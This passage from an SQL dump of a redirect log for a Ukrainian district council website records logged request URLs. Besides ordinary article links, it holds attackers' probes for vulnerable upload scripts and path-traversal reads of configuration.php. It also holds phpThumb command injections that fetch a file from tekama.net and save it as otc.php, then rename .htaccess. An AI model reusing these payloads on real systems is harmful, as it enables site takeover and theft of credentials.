00:00:00',301),(14590,'http://malyn-rayrada.org.ua/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php','','http://malyn-rayrada.org.ua/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php','',9,0,'2015-08-10 09:30:00','0000-00-00 00:00:00',301),(14591,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/function (){return v;}','','http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2010-06-05-12-50-56','',1,0,'2015-08-11 10:06:48','0000-00-00 00:00:00',301),(14592,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/function (){return this.filter(function(a){return a!=null;});}','','http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2010-06-05-12-50-56','',1,0,'2015-08-11 10:06:48','0000-00-00 00:00:00',301),(14593,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/function Array() { [native code] }','','http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2010-06-05-12-50-56','',1,0,'2015-08-11 10:06:49','0000-00-00 00:00:00',301),(14594,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/function (a){this.push.apply(this,a);return this;}','','http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2010-06-05-12-50-56','',2,0,'2015-08-11 10:06:49','0000-00-00 00:00:00',301),(14595,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/function (){return(this.length)?this[this.length-1]:null;}','','http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2010-06-05-12-50-56','',1,0,'2015-08-11 10:06:49','0000-00-00 00:00:00',301),(14596,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/function (i,v){Array.forEach(this,i,v);return this;}','','http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2010-06-05-12-50-56','',1,0,'2015-08-11 10:06:49','0000-00-00 00:00:00',301),(14597,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/function (){return(this.length)?this[Number.random(0,this.length-1)]:null;}','','http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2010-06-05-12-50-56','',1,0,'2015-08-11 10:06:50','0000-00-00 00:00:00',301),(14598,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/function (a){if(!this.contains(a)){this.push(a);}return this;}','','http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2010-06-05-12-50-56','',1,0,'2015-08-11 10:06:50','0000-00-00 00:00:00',301),(14599,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/function (){this.length=0;return this;}','','http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2010-06-05-12-50-56','',1,0,'2015-08-11 10:06:51','0000-00-00 00:00:00',301),(14600,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/function (b){if(this.length!=3){return null;}var a=this.map(function(c){if(c.length==1){c+=c;}return c.toInt(16);});return(b)?a:\"rgb(\"+a+\")\";}','','http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2010-06-05-12-50-56','',1,0,'2015-08-11 10:06:51','0000-00-00 00:00:00',301),(14601,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/function (a,b){return this.indexOf(a,b)!=-1;}','','http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2010-06-05-12-50-56','',1,0,'2015-08-11 10:06:49','0000-00-00 00:00:00',301),(14602,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/function (){return Math.max.apply(null,this);}','','http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2010-06-05-12-50-56','',1,0,'2015-08-11 10:06:52','0000-00-00 00:00:00',301),(14603,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/function (){return Math.min.apply(null,this);}','','http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2010-06-05-12-50-56','',1,0,'2015-08-11 10:06:53','0000-00-00 00:00:00',301),(14604,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/function (){return this.length?this.sum()/this.length:0;}','','http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2010-06-05-12-50-56','',1,0,'2015-08-11 10:06:53','0000-00-00 00:00:00',301),(14605,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/function (){var v=this.length,w=new Array(v);while(v--){w[v]=s(this[v]);}return w;}','','http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2010-06-05-12-50-56','',1,0,'2015-08-11 10:06:49','0000-00-00 00:00:00',301),(14606,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/function (){return[].combine(this);}','','http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2010-06-05-12-50-56','',1,0,'2015-08-11 10:06:54','0000-00-00 00:00:00',301),(14607,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/function (){var c=this[0],d=this[1],k=this[2],h=0;var j=Math.max(c,d,k),f=Math.min(c,d,k);var l=j-f;var i=j/255,g=(j!=0)?l/j:0;if(g!=0){var e=(j-c)/l;var b=(j-d)/l;var m=(j-k)/l;if(c==j){h=m-b;','','http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2010-06-05-12-50-56','',1,0,'2015-08-11 10:06:54','0000-00-00 00:00:00',301),(14608,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/function (a){var b=Array.slice(arguments,1);return this.map(function(c){return c[a].apply(c,b);});}','','http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2010-06-05-12-50-56','',1,0,'2015-08-11 10:06:55','0000-00-00 00:00:00',301),(14609,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/function (){var b=0,c=this.length;if(c){while(c--){b+=this[c];}}return b;}','','http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2010-06-05-12-50-56','',1,0,'2015-08-11 10:06:53','0000-00-00 00:00:00',301),(14610,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/function (){for(var c=this.length;c&&--c;){var b=this[c],d=Math.floor(Math.random()*(c+1));this[c]=this[d];this[d]=b;}return this;}','','http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2010-06-05-12-50-56','',1,0,'2015-08-11 10:06:54','0000-00-00 00:00:00',301),(14611,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/function (b){for(var a=this.length;a--;){if(this[a]===b){this.splice(a,1);}}return this;}','','http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2010-06-05-12-50-56','',1,0,'2015-08-11 10:06:55','0000-00-00 00:00:00',301),(14612,'http://malyn-rayrada.org.ua/forums/wp-admin/admin-ajax.php','','','',1,0,'2015-08-11 14:18:35','0000-00-00 00:00:00',301),(14613,'http://malyn-rayrada.org.ua/forums/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css','','','',1,0,'2015-08-11 14:18:37','0000-00-00 00:00:00',301),(14614,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&catid=37&id=409:-2011-&lang=uk&option=com_content&view=article','','','',5,0,'2015-08-11 17:17:50','0000-00-00 00:00:00',301),(14615,'http://malyn-rayrada.org.ua/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php','','http://malyn-rayrada.org.ua/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php','',3,0,'2015-08-12 04:21:04','0000-00-00 00:00:00',301),(14616,'http://malyn-rayrada.org.ua/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php','','http://malyn-rayrada.org.ua/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php','',9,0,'2015-08-12 05:54:09','0000-00-00 00:00:00',301),(14617,'http://malyn-rayrada.org.ua/dministrator/components/com_redmystic/chart/php-ofc-library/ofc_upload_image.php','','http://malyn-rayrada.org.ua/dministrator/components/com_redmystic/chart/php-ofc-library/ofc_upload_image.php','',1,0,'2015-08-12 09:38:32','0000-00-00 00:00:00',301),(14618,'http://malyn-rayrada.org.ua/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php','','http://malyn-rayrada.org.ua/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php','',3,0,'2015-08-13 02:03:32','0000-00-00 00:00:00',301),(14619,'http://malyn-rayrada.org.ua/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php','','http://malyn-rayrada.org.ua/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php','',3,0,'2015-08-13 03:48:06','0000-00-00 00:00:00',301),(14620,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1064:2013-08-09-07-52-21&lang=ru&option=com_content&view=article','','','',2,0,'2015-08-13 09:50:12','0000-00-00 00:00:00',301),(14621,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=779:2012-10-03-12-34-44&lang=ru&option=com_content&view=article','','','',2,0,'2015-08-13 16:07:33','0000-00-00 00:00:00',301),(14622,'http://malyn-rayrada.org.ua/bigdump.php','','','',5,0,'2015-08-15 06:21:54','0000-00-00 00:00:00',301),(14623,'http://malyn-rayrada.org.ua/bigdump/bigdump.php','','','',5,0,'2015-08-15 06:21:53','0000-00-00 00:00:00',301),(14624,'http://malyn-rayrada.org.ua/dump/bigdump.php','','','',5,0,'2015-08-15 06:21:54','0000-00-00 00:00:00',301),(14625,'http://malyn-rayrada.org.ua/admin/bigdump.php','','','',5,0,'2015-08-15 06:21:55','0000-00-00 00:00:00',301),(14626,'http://malyn-rayrada.org.ua/admin/dump/bigdump.php','','','',5,0,'2015-08-15 06:21:55','0000-00-00 00:00:00',301),(14627,'http://malyn-rayrada.org.ua/backup/bigdump.php','','','',5,0,'2015-08-15 06:21:56','0000-00-00 00:00:00',301),(14628,'http://malyn-rayrada.org.ua/backup/bigdump/bigdump.php','','','',5,0,'2015-08-15 06:21:57','0000-00-00 00:00:00',301),(14629,'http://malyn-rayrada.org.ua/dump/bigdump/bigdump.php','','','',5,0,'2015-08-15 06:21:57','0000-00-00 00:00:00',301),(14630,'http://malyn-rayrada.org.ua/bd/bigdump/bigdump.php','','','',1,0,'2015-08-15 06:21:58','0000-00-00 00:00:00',301),(14631,'http://malyn-rayrada.org.ua/database/bigdump/bigdump.php','','','',1,0,'2015-08-15 06:21:58','0000-00-00 00:00:00',301),(14632,'http://malyn-rayrada.org.ua/mysql/bigdump/bigdump.php','','','',1,0,'2015-08-15 06:21:59','0000-00-00 00:00:00',301),(14633,'http://malyn-rayrada.org.ua/mysql/bigdump.php','','','',1,0,'2015-08-15 06:21:59','0000-00-00 00:00:00',301),(14634,'http://malyn-rayrada.org.ua/db/bigdump.php','','','',1,0,'2015-08-15 06:22:00','0000-00-00 00:00:00',301),(14635,'http://malyn-rayrada.org.ua/database/bigdump.php','','','',1,0,'2015-08-15 06:22:00','0000-00-00 00:00:00',301),(14636,'http://malyn-rayrada.org.ua/data/bigdump.php','','','',1,0,'2015-08-15 06:22:01','0000-00-00 00:00:00',301),(14637,'http://malyn-rayrada.org.ua/files/bigdump.php','','','',1,0,'2015-08-15 06:22:02','0000-00-00 00:00:00',301),(14638,'http://malyn-rayrada.org.ua/store/bigdump.php','','','',1,0,'2015-08-15 06:22:02','0000-00-00 00:00:00',301),(14639,'http://malyn-rayrada.org.ua/forum/bigdump.php','','','',2,0,'2015-08-15 06:22:03','0000-00-00 00:00:00',301),(14640,'http://malyn-rayrada.org.ua/old/bigdump.php','','','',1,0,'2015-08-15 06:22:03','0000-00-00 00:00:00',301),(14641,'http://malyn-rayrada.org.ua/shop/bigdump.php','','','',1,0,'2015-08-15 06:22:04','0000-00-00 00:00:00',301),(14642,'http://malyn-rayrada.org.ua/market/bigdump.php','','','',1,0,'2015-08-15 06:22:04','0000-00-00 00:00:00',301),(14643,'http://malyn-rayrada.org.ua/elfinder.php.html','','','',1,0,'2015-08-15 06:22:07','0000-00-00 00:00:00',301),(14644,'http://malyn-rayrada.org.ua/blog/bigdump.php','','','',1,0,'2015-08-15 06:22:05','0000-00-00 00:00:00',301),(14645,'http://malyn-rayrada.org.ua/sites/all/libraries/elfinder/elfinder.php.html','','','',1,0,'2015-08-15 06:22:06','0000-00-00 00:00:00',301),(14646,'http://malyn-rayrada.org.ua/drupal/sites/all/libraries/elfinder/elfinder.php.html','','','',1,0,'2015-08-15 06:22:06','0000-00-00 00:00:00',301),(14647,'http://malyn-rayrada.org.ua/sites/all/modules/elfinder/elfinder.php.html','','','',1,0,'2015-08-15 06:22:07','0000-00-00 00:00:00',301),(14648,'http://malyn-rayrada.org.ua/elfinder/elfinder.php.html','','','',1,0,'2015-08-15 06:22:08','0000-00-00 00:00:00',301),(14649,'http://malyn-rayrada.org.ua/finder/elfinder.php.html','','','',1,0,'2015-08-15 06:22:08','0000-00-00 00:00:00',301),(14650,'http://malyn-rayrada.org.ua/scripts/elfinder/elfinder.php.html','','','',1,0,'2015-08-15 06:22:10','0000-00-00 00:00:00',301),(14651,'http://malyn-rayrada.org.ua/js/elfinder/elfinder.php.html','','','',1,0,'2015-08-15 06:22:09','0000-00-00 00:00:00',301),(14652,'http://malyn-rayrada.org.ua/public/scripts/elfinder/elfinder.php.html','','','',1,0,'2015-08-15 06:22:10','0000-00-00 00:00:00',301),(14653,'http://malyn-rayrada.org.ua/html/lib/elfinder/elfinder.php.html','','','',1,0,'2015-08-15 06:22:11','0000-00-00 00:00:00',301),(14654,'http://malyn-rayrada.org.ua/administrator/lib/elfinder/elfinder.php.html','','','',1,0,'2015-08-15 06:22:11','0000-00-00 00:00:00',301),(14655,'http://malyn-rayrada.org.ua/lib/elfinder/elfinder.php.html','','','',1,0,'2015-08-15 06:22:12','0000-00-00 00:00:00',301),(14656,'http://malyn-rayrada.org.ua/wp-content/plugins/formcraft/file-upload/server/php/index.php','','','',1,0,'2015-08-15 06:22:13','0000-00-00 00:00:00',301),(14657,'http://malyn-rayrada.org.ua/assets/global/plugins/jquery-file-upload/server/php/index.php','','','',1,0,'2015-08-15 06:22:15','0000-00-00 00:00:00',301),(14658,'http://malyn-rayrada.org.ua/admin/assets/plugins/jquery-file-upload/server/php/index.php','','','',1,0,'2015-08-15 06:22:13','0000-00-00 00:00:00',301),(14659,'http://malyn-rayrada.org.ua/global/plugins/jquery-file-upload/server/php/index.php','','','',1,0,'2015-08-15 06:22:15','0000-00-00 00:00:00',301),(14660,'http://malyn-rayrada.org.ua/assets/plugins/jquery-file-upload/server/php/index.php','','','',1,0,'2015-08-15 06:22:14','0000-00-00 00:00:00',301),(14661,'http://malyn-rayrada.org.ua/plugins/jquery-file-upload/server/php/index.php','','','',1,0,'2015-08-15 06:22:19','0000-00-00 00:00:00',301),(14662,'http://malyn-rayrada.org.ua/assets/jquery-file-upload/server/php/index.php','','','',1,0,'2015-08-15 06:22:16','0000-00-00 00:00:00',301),(14663,'http://malyn-rayrada.org.ua/admin/assets/jquery-file-upload/server/php/index.php','','','',1,0,'2015-08-15 06:22:19','0000-00-00 00:00:00',301),(14664,'http://malyn-rayrada.org.ua/test/assets/plugins/jquery-file-upload/server/php/index.php','','','',1,0,'2015-08-15 06:22:21','0000-00-00 00:00:00',301),(14665,'http://malyn-rayrada.org.ua/metronic/assets/global/plugins/jquery-file-upload/server/php/index.php','','','',1,0,'2015-08-15 06:22:19','0000-00-00 00:00:00',301),(14666,'http://malyn-rayrada.org.ua/admin/assets/global/plugins/jquery-file-upload/server/php/index.php','','','',1,0,'2015-08-15 06:22:19','0000-00-00 00:00:00',301),(14667,'http://malyn-rayrada.org.ua/js/jquery-file-upload/server/php/index.php','','','',1,0,'2015-08-15 06:22:21','0000-00-00 00:00:00',301),(14668,'http://www.malyn-rayrada.org.ua/index.php?option=com_myblog&task=ajaxupload','','','',9,0,'2015-08-15 09:05:44','0000-00-00 00:00:00',301),(14669,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33&id=312:-2011-&lang=uk&option=com_content&view=article','','','',2,0,'2015-08-15 15:19:23','0000-00-00 00:00:00',301),(14670,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=915:--------14--2012--340-l---------2012-2013-------------&lang=ru&option=com_content&view=article','','','',1,0,'2015-08-16 08:28:29','0000-00-00 00:00:00',301),(14671,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56:--03022014-&id=1203:-2014-&lang=uk&option=com_content&view=article','','','',3,0,'2015-08-16 08:28:30','0000-00-00 00:00:00',301),(14672,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1273:2014-04-10-06-15-24&lang=uk&option=com_content&view=article','','','',2,0,'2015-08-16 08:28:31','0000-00-00 00:00:00',301),(14673,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29:--15122010-&id=200:-----------------2006-2010-&lang=ru&option=com_content&view=article','','','',3,0,'2015-08-16 10:05:49','0000-00-00 00:00:00',301),(14674,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1267:2014-04-03-21-52-50&lang=uk&option=com_content&view=article','','','',3,0,'2015-08-16 10:05:50','0000-00-00 00:00:00',301),(14675,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1363:--qq&lang=ru&option=com_content&view=article','','','',1,0,'2015-08-17 03:21:11','0000-00-00 00:00:00',301),(14676,'http://www.malyn-rayrada.org.ua/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=mil.php','','','',7,0,'2015-08-17 17:07:27','0000-00-00 00:00:00',301),(14677,'http://www.malyn-rayrada.org.ua/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=mil.php','','','',7,0,'2015-08-17 17:07:29','0000-00-00 00:00:00',301),(14678,'http://www.malyn-rayrada.org.ua/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','','','',8,0,'2015-08-17 17:07:33','0000-00-00 00:00:00',301),(14679,'http://www.malyn-rayrada.org.ua/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php','','','',8,0,'2015-08-17 17:07:37','0000-00-00 00:00:00',301),(14680,'http://www.malyn-rayrada.org.ua/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php','','','',7,0,'2015-08-17 17:07:39','0000-00-00 00:00:00',301),(14681,'http://www.malyn-rayrada.org.ua/administrator/components/com_redmystic/chart/ofc-library/ofc_upload_image.php','','','',7,0,'2015-08-17 17:07:41','0000-00-00 00:00:00',301),(14682,'http://www.malyn-rayrada.org.ua/administrator/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php','','','',7,0,'2015-08-17 17:07:43','0000-00-00 00:00:00',301),(14683,'http://www.malyn-rayrada.org.ua/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php','','','',7,0,'2015-08-17 17:07:45','0000-00-00 00:00:00',301),(14684,'http://www.malyn-rayrada.org.ua/inc/upload.php','','','',1,0,'2015-08-17 17:08:00','0000-00-00 00:00:00',301),(14685,'http://www.malyn-rayrada.org.ua/components/com_sexycontactform/fileupload/index.php','','','',7,0,'2015-08-17 17:08:04','0000-00-00 00:00:00',301),(14686,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1237:-200-&lang=uk&option=com_content&view=article','','','',1,0,'2015-08-18 09:40:43','0000-00-00 00:00:00',301),(14687,'http://malyn-rayrada.org.ua/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php','','http://malyn-rayrada.org.ua/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php','',7,0,'2015-08-18 09:57:48','0000-00-00 00:00:00',301),(14688,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1007:-4-&lang=uk&option=com_content&view=article','','','',2,0,'2015-08-19 02:00:12','0000-00-00 00:00:00',301),(14689,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45:--14112012-&id=780:2012-10-04-07-48-30&lang=uk&option=com_content&view=article','','','',3,0,'2015-08-19 02:20:07','0000-00-00 00:00:00',301),(14690,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1282:-30-6-&lang=ru&option=com_content&view=article','','','',2,0,'2015-08-19 02:20:13','0000-00-00 00:00:00',301),(14691,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1335:2014-06-07-10-58-30&lang=uk&option=com_content&view=article','','','',1,0,'2015-08-19 07:22:43','0000-00-00 00:00:00',301),(14692,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=958:------------2010-2015-&lang=uk&option=com_content&view=article','','','',2,0,'2015-08-19 19:52:29','0000-00-00 00:00:00',301),(14693,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=480:2011-11-28-10-11-58&lang=uk&option=com_content&view=article','','','',2,0,'2015-08-20 01:53:42','0000-00-00 00:00:00',301),(14694,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=764:2012-09-26-12-58-07&lang=uk&option=com_content&view=article','','','',2,0,'2015-08-20 03:24:24','0000-00-00 00:00:00',301),(14695,'http://www.malyn-rayrada.org.ua/http','','','',2,0,'2015-08-20 04:17:46','0000-00-00 00:00:00',301),(14696,'http://malyn-rayrada.org.ua/components/com_contushdvideoshare/hdflvplayer/download.php?f=../../../configuration.php','','','',1,0,'2015-08-20 04:51:46','0000-00-00 00:00:00',301),(14697,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1291:2014-04-23-11-37-34&lang=ru&option=com_content&view=article','','','',3,0,'2015-08-20 05:11:32','0000-00-00 00:00:00',301),(14698,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1335:2014-06-07-10-58-30&lang=uk&option=com_content&view=article','','','',1,0,'2015-08-20 06:26:19','0000-00-00 00:00:00',301),(14699,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1192:-2014-2015-&lang=uk&option=com_content&view=article','','','',1,0,'2015-08-20 06:26:20','0000-00-00 00:00:00',301),(14700,'http://malyn-rayrada.org.ua/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=mil.php','','','',6,0,'2015-08-20 06:28:41','0000-00-00 00:00:00',301),(14701,'http://malyn-rayrada.org.ua/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=mil.php','','','',6,0,'2015-08-20 06:28:43','0000-00-00 00:00:00',301),(14702,'http://malyn-rayrada.org.ua/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php','','','',8,0,'2015-08-20 06:28:54','0000-00-00 00:00:00',301),(14703,'http://malyn-rayrada.org.ua/administrator/components/com_redmystic/chart/ofc-library/ofc_upload_image.php','','','',6,0,'2015-08-20 06:28:56','0000-00-00 00:00:00',301),(14704,'http://malyn-rayrada.org.ua/administrator/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php','','','',8,0,'2015-08-20 06:28:59','0000-00-00 00:00:00',301),(14705,'http://malyn-rayrada.org.ua/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php','','','',6,0,'2015-08-20 06:29:01','0000-00-00 00:00:00',301),(14706,'http://malyn-rayrada.org.ua/inc/upload.php','','','',6,0,'2015-08-20 06:29:16','0000-00-00 00:00:00',301),(14707,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1310:2014-05-06-14-07-43&lang=ru&option=com_content&view=article','','','',1,0,'2015-08-20 06:59:17','0000-00-00 00:00:00',301),(14708,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1195:2014-01-28-13-01-27&lang=uk&option=com_content&view=article','','','',3,0,'2015-08-20 08:02:59','0000-00-00 00:00:00',301),(14709,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1207:-----------------2007-2015-&lang=uk&option=com_content&view=article','','','',2,0,'2015-08-20 15:33:21','0000-00-00 00:00:00',301),(14710,'http://malyn-rayrada.org.ua/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg;wget http://tekama.net/upl/agger.jpg -O otc.php;&phpThumbDebug=9','','','',1,0,'2015-08-20 17:15:18','0000-00-00 00:00:00',301),(14711,'http://malyn-rayrada.org.ua/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg;wget http://tekama.net/upl/agger.jpg -O otc.php;&phpThumbDebug=9','','','',2,0,'2015-08-20 17:15:25','0000-00-00 00:00:00',301),(14712,'http://malyn-rayrada.org.ua/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg;mv .htaccess ht;&phpThumbDebug=9','','','',1,0,'2015-08-20 17:15:40','0000-00-00 00:00:00',301),(14713,'http://malyn-rayrada.org.ua/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg;mv .htaccess ht;&phpThumbDebug=9','','','',2,0,'2015-08-20 17:15:44','0000-00-00 00:00:00',301),(14714,'http://malyn-rayrada.org.ua/otc.php','','','',1,0,'2015-08-20 17:15:53','0000-00-00 00:00:00',301),(14715,'http://malyn-rayrada.org.ua/phpThumb/otc.php','','','',2,0,'2015-08-20 17:15:57','0000-00-00 00:00:00',301),(14716,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1184:----27----6-&lang=uk&option=com_content&view=article','','','',1,0,'2015-08-20 23:09:00','0000-00-00 00:00:00',301),(14717,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=200:-----------------2006-2010-&catid=29&Itemid=60&lang=uk','','','',1,0,'2015-08-21 03:09:20','0000-00-00 00:00:00',301),(14718,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=198:------------2006-2010-r&catid=29&Itemid=60&lang=en','','','',1,0,'2015-08-21 03:23:00','0000-00-00 00:00:00',301),(14719,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=758:--15---&catid=11&Itemid=14&lang=uk','','','',1,0,'2015-08-21 03:30:19','0000-00-00 00:00:00',301),(14720,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=411:-2014-&catid=37:--21102011-&Itemid=72&lang=en','','','',1,0,'2015-08-21 05:06:51','0000-00-00 00:00:00',301),(14721,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1247:2014-03-20-14-37-15&lang=uk&option=com_content&view=article','','','',1,0,'2015-08-21 09:44:14','0000-00-00 00:00:00',301),(14722,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=510:-2011-&lang=ru&option=com_content&view=article','','','',3,0,'2015-08-21 15:48:36','0000-00-00 00:00:00',301),(14723,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1183:2014-01-28-09-18-31&catid=11&lang=ru&Itemid=','','','',1,0,'2015-08-22 04:07:54','0000-00-00 00:00:00',301),(14724,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=550:2012-01-26-12-39-51&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',1,0,'2015-08-22 06:51:36','0000-00-00 00:00:00',301),(14725,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=877:-2013-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',1,0,'2015-08-22 07:35:48','0000-00-00 00:00:00',301),(14726,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=750:2012-09-01-09-40-02&catid=11&lang=uk&Itemid=0','','','',1,0,'2015-08-22 07:37:05','0000-00-00 00:00:00',301),(14727,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=780:2012-10-04-07-48-30&catid=36&Itemid=70&lang=ru','','','',1,0,'2015-08-22 09:24:13','0000-00-00 00:00:00',301),(14728,'http://malyn-rayrada.org.ua/wp-content/plugins/revslider/temp/update_extract/revslider/joss.php','','','',2,0,'2015-08-22 15:43:04','0000-00-00 00:00:00',301),(14729,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&id=10:2013-02-22-07-29-10&lang=uk&option=com_poll','','http://go.mail.ru/search_images','',1,0,'2015-08-23 13:58:47','0000-00-00 00:00:00',301),(14730,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1352:2014-06-26-06-51-20&lang=uk&option=com_content&view=article','','','',1,0,'2015-08-24 01:00:01','0000-00-00 00:00:00',301),(14731,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=836:-6732012&lang=en&option=com_content&view=article','','','',1,0,'2015-08-24 01:00:02','0000-00-00 00:00:00',301),(14732,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1373:2014-08-07-11-39-57&lang=ru&option=com_content&view=article','','','',1,0,'2015-08-24 05:30:13','0000-00-00 00:00:00',301),(14733,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1234:2014-03-04-09-59-46&lang=ru&option=com_content&view=article','','','',1,0,'2015-08-24 14:38:34','0000-00-00 00:00:00',301),(14734,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1239:--29----6-&lang=uk&option=com_content&view=article','','','',1,0,'2015-08-24 16:07:55','0000-00-00 